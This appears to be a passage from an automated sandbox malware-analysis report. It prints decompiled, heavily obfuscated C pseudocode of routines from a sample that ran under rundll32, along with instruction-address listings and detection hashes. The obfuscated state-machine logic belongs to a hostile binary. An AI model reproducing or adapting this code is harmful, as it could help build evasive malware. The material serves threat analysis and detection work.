				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t442;
				intOrPtr _t446;
				intOrPtr _t448;
				signed int _t458;
				signed int _t460;
				void* _t461;
				void* _t492;
				signed int _t502;
				intOrPtr _t503;
				intOrPtr* _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				void* _t515;
				signed int* _t518;
				void* _t521;

				_t518 =  &_v1760;
				_v1576 = 0xf21b90;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t505 = 0x2b;
				asm("stosd");
				_t461 = 0x34076d8;
				asm("stosd");
				_v1580 = 0xbaeef6;
				_v1580 = _v1580 + 0xba3c;
				_v1580 = _v1580 ^ 0x00bba91b;
				_v1660 = 0x2ae6d5;
				_v1660 = _v1660 << 6;
				_v1660 = _v1660 / _t505;
				_v1660 = _v1660 ^ 0x0030dab5;
				_v1716 = 0xb009df;
				_v1716 = _v1716 ^ 0xf6c25862;
				_v1716 = _v1716 + 0xcd46;
				_v1716 = _v1716 + 0x716d;
				_v1716 = _v1716 ^ 0xf6739072;
				_v1588 = 0x61188e;
				_v1588 = _v1588 ^ 0xbe54106a;
				_v1588 = _v1588 ^ 0xbe3508e6;
				_v1600 = 0x5c78c8;
				_v1600 = _v1600 | 0xa4208796;
				_v1600 = _v1600 ^ 0xa47cffde;
				_v1684 = 0xfd831d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 >> 0xc;
				_v1684 = _v1684 ^ 0x0001fb16;
				_v1608 = 0x3a7886;
				_v1608 = _v1608 + 0xffff806f;
				_v1608 = _v1608 ^ 0x003b1c87;
				_v1616 = 0x5dea07;
				_t506 = 9;
				_v1616 = _v1616 * 0x59;
				_v1616 = _v1616 ^ 0x20ad8776;
				_v1708 = 0xdb05ba;
				_v1708 = _v1708 ^ 0x457fa961;
				_v1708 = _v1708 | 0x4dd1de05;
				_v1708 = _v1708 + 0xffff2bcd;
				_v1708 = _v1708 ^ 0x4dffde68;
				_v1740 = 0x5f9fa;
				_v1740 = _v1740 >> 0x10;
				_v1740 = _v1740 * 0x47;
				_v1740 = _v1740 / _t506;
				_v1740 = _v1740 ^ 0x0003f3c1;
				_v1700 = 0xeda1e9;
				_v1700 = _v1700 << 0xb;
				_t507 = 0x4c;
				_v1700 = _v1700 * 0x17;
				_v1700 = _v1700 ^ 0xcc50fc90;
				_v1688 = 0xc376bf;
				_v1688 = _v1688 + 0xffffce34;
				_v1688 = _v1688 << 0xf;
				_v1688 = _v1688 ^ 0xa27d2095;
				_v1736 = 0x77df39;
				_v1736 = _v1736 >> 4;
				_v1736 = _v1736 >> 7;
				_v1736 = _v1736 / _t507;
				_v1736 = _v1736 ^ 0x0006bba1;
				_v1744 = 0xdb3f7a;
				_v1744 = _v1744 << 0xc;
				_t508 = 0x46;
				_v1744 = _v1744 / _t508;
				_t509 = 0x2e;
				_v1744 = _v1744 / _t509;
				_v1744 = _v1744 ^ 0x0009adba;
				_v1620 = 0x28e24f;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 ^ 0x00586b21;
				_v1720 = 0xedf2ea;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0xd060;
				_v1720 = _v1720 ^ 0x00e1c656;
				_v1728 = 0x3692b9;
				_v1728 = _v1728 + 0xffff0cc0;
				_v1728 = _v1728 ^ 0x15726ff1;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 ^ 0xa3f1c3b7;
				_v1628 = 0xe9d0b6;
				_v1628 = _v1628 + 0xffff0b2c;
				_v1628 = _v1628 ^ 0x00e13fcd;
				_v1672 = 0xb5656;
				_v1672 = _v1672 << 1;
				_t510 = 0x75;
				_v1672 = _v1672 / _t510;
				_v1672 = _v1672 ^ 0x0000c760;
				_v1636 = 0xb446a;
				_t511 = 0x66;
				_v1636 = _v1636 * 0x2c;
				_v1636 = _v1636 ^ 0x01e018a2;
				_v1612 = 0x7754cf;
				_v1612 = _v1612 ^ 0x9195c63c;
				_v1612 = _v1612 ^ 0x91eaa7e8;
				_v1656 = 0x90fdf5;
				_v1656 = _v1656 | 0x8a72400d;
				_v1656 = _v1656 / _t511;
				_v1656 = _v1656 ^ 0x015bbc23;
				_v1664 = 0xea1595;
				_v1664 = _v1664 ^ 0x656fc689;
				_t512 = 0x1d;
				_v1664 = _v1664 / _t512;
				_v1664 = _v1664 ^ 0x0381a839;
				_v1724 = 0x1903df;
				_v1724 = _v1724 ^ 0xd471d85a;
				_v1724 = _v1724 << 9;
				_v1724 = _v1724 + 0xa250;
				_v1724 = _v1724 ^ 0xd1be858e;
				_v1592 = 0x634acd;
				_v1592 = _v1592 >> 1;
				_v1592 = _v1592 ^ 0x0031fc8c;
				_v1624 = 0x214267;
				_v1624 = _v1624 >> 0xe;
				_v1624 = _v1624 ^ 0x000cae4b;
				_v1748 = 0xf70b55;
				_v1748 = _v1748 ^ 0x8376c783;
				_v1748 = _v1748 + 0xffff9546;
				_v1748 = _v1748 ^ 0x30c8a062;
				_v1748 = _v1748 ^ 0xb347cf79;
				_v1644 = 0x4a974c;
				_v1644 = _v1644 + 0xf754;
				_v1644 = _v1644 ^ 0x0044301a;
				_v1756 = 0xfefcd0;
				_v1756 = _v1756 + 0xffff9941;
				_v1756 = _v1756 << 0xc;
				_v1756 = _v1756 + 0x3291;
				_v1756 = _v1756 ^ 0xe96b65aa;
				_v1632 = 0x34bd00;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 ^ 0x97a30bc0;
				_v1676 = 0xf19685;
				_t513 = 0x7b;
				_v1676 = _v1676 * 0x54;
				_v1676 = _v1676 ^ 0x1e84cba5;
				_v1676 = _v1676 ^ 0x51c47a4f;
				_v1652 = 0x3d5ed0;
				_v1652 = _v1652 * 7;
				_v1652 = _v1652 / _t513;
				_v1652 = _v1652 ^ 0x0004a817;
				_v1668 = 0x31208a;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 + 0x3afc;
				_v1668 = _v1668 ^ 0x0186e9ee;
				_v1692 = 0x9120a;
				_v1692 = _v1692 + 0xffff3905;
				_v1692 = _v1692 ^ 0x12b553f3;
				_v1692 = _v1692 ^ 0x12bb5ad6;
				_v1680 = 0x26d3f8;
				_v1680 = _v1680 << 7;
				_v1680 = _v1680 + 0xa827;
				_v1680 = _v1680 ^ 0x136c77e8;
				_v1584 = 0x751146;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x3a8d2dd0;
				_v1732 = 0x266ad0;
				_v1732 = _v1732 + 0xffffe92f;
				_v1732 = _v1732 | 0xe77a0674;
				_v1732 = _v1732 << 8;
				_v1732 = _v1732 ^ 0x7e56f20f;
				_v1640 = 0xc95fbf;
				_v1640 = _v1640 >> 1;
				_v1640 = _v1640 ^ 0x006563fc;
				_v1752 = 0xe51758;
				_v1752 = _v1752 + 0x7d69;
				_v1752 = _v1752 << 8;
				_v1752 = _v1752 >> 5;
				_v1752 = _v1752 ^ 0x0727d5ea;
				_v1696 = 0x906e7e;
				_t514 = 0x72;
				_v1696 = _v1696 / _t514;
				_v1696 = _v1696 << 0xd;
				_v1696 = _v1696 ^ 0x288be572;
				_v1760 = 0xae4c89;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 * 0x14;
				_v1760 = _v1760 | 0x4c6e4d0e;
				_v1760 = _v1760 ^ 0x4cfa322f;
				_v1704 = 0x3b4ff5;
				_v1704 = _v1704 + 0xd6b6;
				_v1704 = _v1704 << 0x10;
				_v1704 = _v1704 << 0xe;
				_v1704 = _v1704 ^ 0xc00053ef;
				_v1604 = 0xa38704;
				_v1604 = _v1604 + 0xffffb37d;
				_v1604 = _v1604 ^ 0x00a5c604;
				_v1712 = 0x302894;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 + 0xffffae4b;
				_v1712 = _v1712 + 0xffff6004;
				_v1712 = _v1712 ^ 0x0c025a19;
				_t515 = 0x5a6577d;
				_t517 = _v1596;
				_t502 = _v1596;
				_t460 = _v1596;
				_v1648 = 0xc7a381;
				_v1648 = _v1648 ^ 0xa2d00ae3;
				_v1648 = _v1648 >> 0xa;
				_v1648 = _v1648 ^ 0x002465a0;
				while(1) {
					L1:
					_t492 = 0x5c;
					do {
						while(1) {
							L2:
							_t521 = _t461 - _t515;
							if(_t521 <= 0) {
								break;
							}
							__eflags = _t461 - 0x744da3a;
							if(__eflags == 0) {
								_push(_v1744);
								_push(_v1736);
								_push(0x1710fc);
								_t442 = E0017AB66(_v1700, _v1688, __eflags);
								E0018C66E( &_v1560, __eflags);
								_t446 =  *0x19520c; // 0x0
								_t448 =  *0x19520c; // 0x0
								__eflags = _t448 + 0x220;
								E0018BDB5( &_v520, _t448 + 0x220, _v1620, _v1720, _v1728, _v1628, _t448 + 0x220, _v1672, _v1636, _t446 + 8,  &_v1560,  &_v1040, _t442);
								E0017AE03(_v1612, _v1656, _v1664, _t442);
								_t518 =  &(_t518[0x10]);
								_t461 = 0xe241e24;
								_t515 = 0x5a6577d;
								_t492 = 0x5c;
								goto L26;
							} else {
								__eflags = _t461 - 0xe241e24;
								if(_t461 == 0xe241e24) {
									_t503 =  *0x19520c; // 0x0
									_t504 = _t503 + 0x220;
									while(1) {
										__eflags =  *_t504 - _t492;
										if( *_t504 == _t492) {
											break;
										}
										_t504 = _t504 + 2;
										__eflags = _t504;
									}
									_t502 = _t504 + 2;
									_t461 = 0x4f55465;
									continue;
								} else {
									__eflags = _t461 - 0xe6f489b;
									if(_t461 != 0xe6f489b) {
										goto L26;
									} else {
										E0018E689(_v1704, _v1604, _v1712, _t460, _v1648);
									}
								}
							}
							L20:
							return _v1596;
						}
						if(_t521 == 0) {
							E0018E689(_v1640, _v1752, _v1696, _t517, _v1760);
							_t518 =  &(_t518[3]);
							goto L15;
						} else {
							if(_t461 == 0x2fdd9cd) {
								E0018EE94(_t517, _t460, _v1584, _v1732);
								_t461 = _t515;
								goto L1;
							} else {
								if(_t461 == 0x34076d8) {
									_push(_t461);
									E0017EA7B( &_v1040, _v1608, _v1580, _t461, _v1616, _v1708, _v1740);
									_t518 =  &(_t518[7]);
									_t461 = 0x744da3a;
									while(1) {
										L1:
										_t492 = 0x5c;
										goto L2;
									}
								} else {
									if(_t461 == 0x4f55465) {
										_t460 = E0017EB36(_v1724, _v1592, _t461, _v1660);
										_t518 =  &(_t518[3]);
										__eflags = _t460;
										if(_t460 != 0) {
											_t461 = 0x5350d19;
											while(1) {
												L1:
												_t492 = 0x5c;
												goto L2;
											}
										}
									} else {
										if(_t461 != 0x5350d19) {
											goto L26;
										} else {
											_t458 = E00180188(_t461, _v1624, _t460, _v1748, _t502, _v1644, _v1716, _t502, _v1756, _v1632, _v1676, _t461, _v1652, _v1684, _t461, _t461, _v1668, _v1600, _v1692, _t461,  &_v520, _v1588, _v1680);
											_t517 = _t458;
											_t518 =  &(_t518[0x15]);
											if(_t458 == 0) {
												L15:
												_t461 = 0xe6f489b;
												while(1) {
													L1:
													_t492 = 0x5c;
													goto L2;
												}
											} else {
												_t461 = 0x2fdd9cd;
												_v1596 = 1;
												while(1) {
													L1:
													_t492 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						goto L20;
						L26:
						__eflags = _t461 - 0xbde599c;
					} while (_t461 != 0xbde599c);
					goto L20;
				}
			}













































































                                                                                                                      0x00182bf6
                                                                                                                      0x00182bfc
                                                                                                                      0x00182c14
                                                                                                                      0x00182c1c
                                                                                                                      0x00182c21
                                                                                                                      0x00182c24
                                                                                                                      0x00182c25
                                                                                                                      0x00182c2a
                                                                                                                      0x00182c2b
                                                                                                                      0x00182c36
                                                                                                                      0x00182c41
                                                                                                                      0x00182c4c
                                                                                                                      0x00182c54
                                                                                                                      0x00182c61
                                                                                                                      0x00182c65
                                                                                                                      0x00182c6d
                                                                                                                      0x00182c75
                                                                                                                      0x00182c7d
                                                                                                                      0x00182c85
                                                                                                                      0x00182c8d
                                                                                                                      0x00182c95
                                                                                                                      0x00182ca0
                                                                                                                      0x00182cab
                                                                                                                      0x00182cb6
                                                                                                                      0x00182cc1
                                                                                                                      0x00182ccc
                                                                                                                      0x00182cd7
                                                                                                                      0x00182cdf
                                                                                                                      0x00182ce4
                                                                                                                      0x00182ce9
                                                                                                                      0x00182cf1
                                                                                                                      0x00182cfc
                                                                                                                      0x00182d07
                                                                                                                      0x00182d12
                                                                                                                      0x00182d25
                                                                                                                      0x00182d28
                                                                                                                      0x00182d2f
                                                                                                                      0x00182d3a
                                                                                                                      0x00182d42
                                                                                                                      0x00182d4a
                                                                                                                      0x00182d52
                                                                                                                      0x00182d5a
                                                                                                                      0x00182d62
                                                                                                                      0x00182d6a
                                                                                                                      0x00182d74
                                                                                                                      0x00182d80
                                                                                                                      0x00182d84
                                                                                                                      0x00182d8c
                                                                                                                      0x00182d94
                                                                                                                      0x00182d9e
                                                                                                                      0x00182d9f
                                                                                                                      0x00182da3
                                                                                                                      0x00182dab
                                                                                                                      0x00182db3
                                                                                                                      0x00182dbb
                                                                                                                      0x00182dc0
                                                                                                                      0x00182dc8
                                                                                                                      0x00182dd0
                                                                                                                      0x00182dd5
                                                                                                                      0x00182de0
                                                                                                                      0x00182de4
                                                                                                                      0x00182dec
                                                                                                                      0x00182df6
                                                                                                                      0x00182e01
                                                                                                                      0x00182e06
                                                                                                                      0x00182e10
                                                                                                                      0x00182e15
                                                                                                                      0x00182e1b
                                                                                                                      0x00182e23
                                                                                                                      0x00182e2e
                                                                                                                      0x00182e35
                                                                                                                      0x00182e40
                                                                                                                      0x00182e48
                                                                                                                      0x00182e4d
                                                                                                                      0x00182e52
                                                                                                                      0x00182e5a
                                                                                                                      0x00182e62
                                                                                                                      0x00182e6a
                                                                                                                      0x00182e72
                                                                                                                      0x00182e7a
                                                                                                                      0x00182e7f
                                                                                                                      0x00182e87
                                                                                                                      0x00182e92
                                                                                                                      0x00182e9d
                                                                                                                      0x00182ea8
                                                                                                                      0x00182eb0
                                                                                                                      0x00182eb8
                                                                                                                      0x00182ebd
                                                                                                                      0x00182ec3
                                                                                                                      0x00182ecb
                                                                                                                      0x00182ede
                                                                                                                      0x00182ee1
                                                                                                                      0x00182ee8
                                                                                                                      0x00182ef3
                                                                                                                      0x00182efe
                                                                                                                      0x00182f09
                                                                                                                      0x00182f14
                                                                                                                      0x00182f1c
                                                                                                                      0x00182f2c
                                                                                                                      0x00182f30
                                                                                                                      0x00182f38
                                                                                                                      0x00182f40
                                                                                                                      0x00182f4c
                                                                                                                      0x00182f4f
                                                                                                                      0x00182f53
                                                                                                                      0x00182f5b
                                                                                                                      0x00182f63
                                                                                                                      0x00182f6b
                                                                                                                      0x00182f70
                                                                                                                      0x00182f78
                                                                                                                      0x00182f80
                                                                                                                      0x00182f8b
                                                                                                                      0x00182f92
                                                                                                                      0x00182f9d
                                                                                                                      0x00182fa8
                                                                                                                      0x00182fb0
                                                                                                                      0x00182fbb
                                                                                                                      0x00182fc3
                                                                                                                      0x00182fcb
                                                                                                                      0x00182fd3
                                                                                                                      0x00182fdb
                                                                                                                      0x00182fe3
                                                                                                                      0x00182ff0
                                                                                                                      0x00182ffb
                                                                                                                      0x00183006
                                                                                                                      0x0018300e
                                                                                                                      0x00183016
                                                                                                                      0x0018301b
                                                                                                                      0x00183023
                                                                                                                      0x0018302b
                                                                                                                      0x00183036
                                                                                                                      0x0018303e
                                                                                                                      0x00183049
                                                                                                                      0x00183058
                                                                                                                      0x0018305b
                                                                                                                      0x0018305f
                                                                                                                      0x00183067
                                                                                                                      0x0018306f
                                                                                                                      0x00183082
                                                                                                                      0x00183094
                                                                                                                      0x0018309b
                                                                                                                      0x001830a6
                                                                                                                      0x001830ae
                                                                                                                      0x001830b3
                                                                                                                      0x001830bb
                                                                                                                      0x001830c3
                                                                                                                      0x001830cb
                                                                                                                      0x001830d3
                                                                                                                      0x001830db
                                                                                                                      0x001830e3
                                                                                                                      0x001830eb
                                                                                                                      0x001830f0
                                                                                                                      0x001830f8
                                                                                                                      0x00183100
                                                                                                                      0x0018310b
                                                                                                                      0x00183113
                                                                                                                      0x0018311e
                                                                                                                      0x00183126
                                                                                                                      0x0018312e
                                                                                                                      0x00183136
                                                                                                                      0x0018313b
                                                                                                                      0x00183143
                                                                                                                      0x0018314e
                                                                                                                      0x00183155
                                                                                                                      0x00183160
                                                                                                                      0x00183168
                                                                                                                      0x00183170
                                                                                                                      0x00183175
                                                                                                                      0x0018317a
                                                                                                                      0x00183182
                                                                                                                      0x0018318e
                                                                                                                      0x00183191
                                                                                                                      0x00183195
                                                                                                                      0x0018319a
                                                                                                                      0x001831a2
                                                                                                                      0x001831aa
                                                                                                                      0x001831b4
                                                                                                                      0x001831b8
                                                                                                                      0x001831c0
                                                                                                                      0x001831c8
                                                                                                                      0x001831d0
                                                                                                                      0x001831d8
                                                                                                                      0x001831dd
                                                                                                                      0x001831e2
                                                                                                                      0x001831ea
                                                                                                                      0x001831f5
                                                                                                                      0x00183200
                                                                                                                      0x0018320b
                                                                                                                      0x00183213
                                                                                                                      0x00183218
                                                                                                                      0x00183220
                                                                                                                      0x00183228
                                                                                                                      0x00183230
                                                                                                                      0x00183235
                                                                                                                      0x0018323c
                                                                                                                      0x00183243
                                                                                                                      0x0018324a
                                                                                                                      0x00183255
                                                                                                                      0x00183260
                                                                                                                      0x00183268
                                                                                                                      0x00183273
                                                                                                                      0x00183273
                                                                                                                      0x00183275
                                                                                                                      0x00183276
                                                                                                                      0x00183276
                                                                                                                      0x00183276
                                                                                                                      0x00183276
                                                                                                                      0x00183278
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001833e4
                                                                                                                      0x001833ea
                                                                                                                      0x00183454
                                                                                                                      0x00183458
                                                                                                                      0x00183464
                                                                                                                      0x00183469
                                                                                                                      0x00183477
                                                                                                                      0x00183492
                                                                                                                      0x001834b0
                                                                                                                      0x001834b5
                                                                                                                      0x001834d1
                                                                                                                      0x001834ec
                                                                                                                      0x001834f1
                                                                                                                      0x001834f4
                                                                                                                      0x001834f9
                                                                                                                      0x00183500
                                                                                                                      0x00000000
                                                                                                                      0x001833ec
                                                                                                                      0x001833ec
                                                                                                                      0x001833f2
                                                                                                                      0x00183431
                                                                                                                      0x00183437
                                                                                                                      0x00183442
                                                                                                                      0x00183442
                                                                                                                      0x00183445
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018343f
                                                                                                                      0x0018343f
                                                                                                                      0x0018343f
                                                                                                                      0x00183447
                                                                                                                      0x0018344a
                                                                                                                      0x00000000
                                                                                                                      0x001833f4
                                                                                                                      0x001833f4
                                                                                                                      0x001833fa
                                                                                                                      0x00000000
                                                                                                                      0x00183400
                                                                                                                      0x00183417
                                                                                                                      0x0018341c
                                                                                                                      0x001833fa
                                                                                                                      0x001833f2
                                                                                                                      0x0018341f
                                                                                                                      0x00183430
                                                                                                                      0x00183430
                                                                                                                      0x0018327e
                                                                                                                      0x001833d2
                                                                                                                      0x001833d7
                                                                                                                      0x00000000
                                                                                                                      0x00183284
                                                                                                                      0x0018328a
                                                                                                                      0x001833b0
                                                                                                                      0x001833b7
                                                                                                                      0x00000000
                                                                                                                      0x00183290
                                                                                                                      0x00183296
                                                                                                                      0x00183369
                                                                                                                      0x0018338f
                                                                                                                      0x00183394
                                                                                                                      0x00183397
                                                                                                                      0x00183273
                                                                                                                      0x00183273
                                                                                                                      0x00183275
                                                                                                                      0x00000000
                                                                                                                      0x00183275
                                                                                                                      0x0018329c
                                                                                                                      0x001832a2
                                                                                                                      0x00183352
                                                                                                                      0x00183354
                                                                                                                      0x00183357
                                                                                                                      0x00183359
                                                                                                                      0x0018335f
                                                                                                                      0x00183273
                                                                                                                      0x00183273
                                                                                                                      0x00183275
                                                                                                                      0x00000000
                                                                                                                      0x00183275
                                                                                                                      0x00183273
                                                                                                                      0x001832a8
                                                                                                                      0x001832ae
                                                                                                                      0x00000000
                                                                                                                      0x001832b4
                                                                                                                      0x00183316
                                                                                                                      0x0018331b
                                                                                                                      0x0018331d
                                                                                                                      0x00183322
                                                                                                                      0x001833da
                                                                                                                      0x001833da
                                                                                                                      0x00183273
                                                                                                                      0x00183273
                                                                                                                      0x00183275
                                                                                                                      0x00000000
                                                                                                                      0x00183275
                                                                                                                      0x00183328
                                                                                                                      0x00183328
                                                                                                                      0x0018332d
                                                                                                                      0x00183273
                                                                                                                      0x00183273
                                                                                                                      0x00183275
                                                                                                                      0x00000000
                                                                                                                      0x00183275
                                                                                                                      0x00183273
                                                                                                                      0x00183322
                                                                                                                      0x001832ae
                                                                                                                      0x001832a2
                                                                                                                      0x00183296
                                                                                                                      0x0018328a
                                                                                                                      0x00000000
                                                                                                                      0x00183501
                                                                                                                      0x00183501
                                                                                                                      0x00183501
                                                                                                                      0x00000000
                                                                                                                      0x0018350d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !kX$gB!$i}$mq$S
                                                                                                                      • API String ID: 0-2280178044
                                                                                                                      • Opcode ID: ea718dd6b57d36bdae58b7e6d718b81258bf2adfbc581f27b55074e1a6c8db38
                                                                                                                      • Instruction ID: 7fd66019fc8c1e8eaf1187a68fcd9d2449c7b195716df7bd66273837e03ae079
                                                                                                                      • Opcode Fuzzy Hash: ea718dd6b57d36bdae58b7e6d718b81258bf2adfbc581f27b55074e1a6c8db38
                                                                                                                      • Instruction Fuzzy Hash: 32222471509380DFD765DF25C889A8FBBE2FBC4758F14891DE29A86260D7B18A48CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018B391 Relevance: 6.5, Strings: 5, Instructions: 285COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0018B391() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _t301;
				intOrPtr _t304;
				void* _t307;
				void* _t308;
				intOrPtr _t309;
				intOrPtr _t311;
				void* _t315;
				void* _t316;
				char _t321;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				void* _t352;

				_v688 = 0x901d1c;
				_v688 = _v688 >> 1;
				_t316 = 0x1066f98;
				_v688 = _v688 >> 0xb;
				_v688 = _v688 >> 4;
				_v688 = _v688 ^ 0x00000091;
				_v672 = 0xe40ad3;
				_v672 = _v672 + 0xffffd85d;
				_v672 = _v672 * 0x13;
				_t315 = 0;
				_v672 = _v672 + 0xffff2a54;
				_v672 = _v672 ^ 0x10e907e4;
				_v592 = 0x3017ed;
				_t345 = 7;
				_v592 = _v592 * 0x4e;
				_v592 = _v592 ^ 0x0ea74a35;
				_v660 = 0x55ed7f;
				_v660 = _v660 << 0xa;
				_v660 = _v660 ^ 0xe1a17f4c;
				_v660 = _v660 ^ 0xb614834c;
				_v608 = 0x9a742a;
				_v608 = _v608 / _t345;
				_v608 = _v608 ^ 0x00111f40;
				_v620 = 0xa60b0f;
				_v620 = _v620 | 0xf97ffff7;
				_v620 = _v620 ^ 0xf9fd807b;
				_v648 = 0xfa23dc;
				_v648 = _v648 + 0xc8b0;
				_v648 = _v648 ^ 0x1c787af5;
				_v648 = _v648 ^ 0x1c8a9b8c;
				_v644 = 0x871147;
				_v644 = _v644 ^ 0x5acff931;
				_t346 = 0x17;
				_v644 = _v644 / _t346;
				_v644 = _v644 ^ 0x03ea575c;
				_v676 = 0x868c3;
				_v676 = _v676 | 0x99683da5;
				_v676 = _v676 ^ 0x7cfc9963;
				_v676 = _v676 * 0x60;
				_v676 = _v676 ^ 0x17da9425;
				_v692 = 0x1af18a;
				_v692 = _v692 >> 5;
				_v692 = _v692 >> 9;
				_v692 = _v692 | 0x73f4147c;
				_v692 = _v692 ^ 0x73f59be7;
				_v588 = 0xc5bea0;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0x00674961;
				_v640 = 0x2d0675;
				_v640 = _v640 << 0x10;
				_v640 = _v640 * 0x13;
				_v640 = _v640 ^ 0x7aa9e3bb;
				_v684 = 0x479e10;
				_v684 = _v684 >> 4;
				_v684 = _v684 >> 4;
				_v684 = _v684 + 0xffff346b;
				_v684 = _v684 ^ 0xfffe4734;
				_v632 = 0xc30056;
				_v632 = _v632 * 0x5c;
				_v632 = _v632 * 0x6f;
				_v632 = _v632 ^ 0x62b5b133;
				_v652 = 0xa7e056;
				_v652 = _v652 + 0xffffad3c;
				_v652 = _v652 + 0x159e;
				_v652 = _v652 ^ 0x00a9a717;
				_v656 = 0x7de4be;
				_v656 = _v656 ^ 0xe25ca0e3;
				_v656 = _v656 + 0xfffff925;
				_v656 = _v656 ^ 0xe22d648b;
				_v624 = 0x8a5e75;
				_v624 = _v624 << 1;
				_v624 = _v624 ^ 0x6ebaa440;
				_v624 = _v624 ^ 0x6faa9c0f;
				_v612 = 0xc07e93;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x000a477b;
				_v680 = 0x9e34fb;
				_v680 = _v680 ^ 0x08ee2ed2;
				_v680 = _v680 | 0xddc8b22d;
				_v680 = _v680 + 0xffff580d;
				_v680 = _v680 ^ 0xddf50a5e;
				_v580 = 0xd0aa6a;
				_t347 = 0x7f;
				_v580 = _v580 / _t347;
				_v580 = _v580 ^ 0x000dde97;
				_v576 = 0xcc5a;
				_v576 = _v576 + 0xffff83d9;
				_v576 = _v576 ^ 0x0009e5e2;
				_v600 = 0x582413;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0xb0446c4a;
				_v628 = 0x333e17;
				_v628 = _v628 + 0x2781;
				_v628 = _v628 << 2;
				_v628 = _v628 ^ 0x00cb68d0;
				_v636 = 0xefc605;
				_v636 = _v636 + 0xf21d;
				_v636 = _v636 ^ 0xa2cf77f2;
				_v636 = _v636 ^ 0xa23a4adf;
				_v584 = 0xc861d6;
				_v584 = _v584 + 0xfffffbc1;
				_v584 = _v584 ^ 0x00c0ae4c;
				_v696 = 0x7445bb;
				_v696 = _v696 >> 4;
				_v696 = _v696 >> 4;
				_t348 = 0x3d;
				_v696 = _v696 / _t348;
				_v696 = _v696 ^ 0x0009867a;
				_v668 = 0xeed7a6;
				_v668 = _v668 + 0xffff818b;
				_v668 = _v668 + 0xffff94c8;
				_v668 = _v668 | 0xd4d5cc38;
				_v668 = _v668 ^ 0xd4f8ebbd;
				_v616 = 0xaa402c;
				_v616 = _v616 | 0x0a4de871;
				_v616 = _v616 ^ 0x0aee0038;
				_v596 = 0xe91624;
				_v596 = _v596 << 5;
				_v596 = _v596 ^ 0x1d2db722;
				_v664 = 0xe73f23;
				_v664 = _v664 + 0xffff972a;
				_v664 = _v664 | 0x942ef86c;
				_v664 = _v664 ^ 0xa565e6c8;
				_v664 = _v664 ^ 0x31893120;
				_v604 = 0xdd76c6;
				_t349 = 0x2b;
				_t344 = _v616;
				_v604 = _v604 / _t349;
				_v604 = _v604 ^ 0x0000a605;
				do {
					while(_t316 != 0xb706b9) {
						if(_t316 == 0x1066f98) {
							_t316 = 0x2a9290b;
							continue;
						} else {
							if(_t316 == 0x2a9290b) {
								E0018BBB2(_v608, _v620,  &_v572);
								_t316 = 0xb706b9;
								continue;
							} else {
								if(_t316 == 0x5ceff6a) {
									_t301 = E0018E938(0, _v672, _v680, _v580, _v592, _t316, _v576, _v600, _t316, _v628, _v688,  &_v524);
									_t344 = _t301;
									_t352 = _t352 + 0x28;
									__eflags = _t301 - 0xffffffff;
									if(__eflags != 0) {
										_t316 = 0xefecb64;
										continue;
									}
								} else {
									if(_t316 == 0xe98dd96) {
										E00184DAD(_v616, _v596, _t344, _v664, _v604);
									} else {
										if(_t316 == 0xefecb64) {
											_t304 = _v568;
											_t321 = _v572;
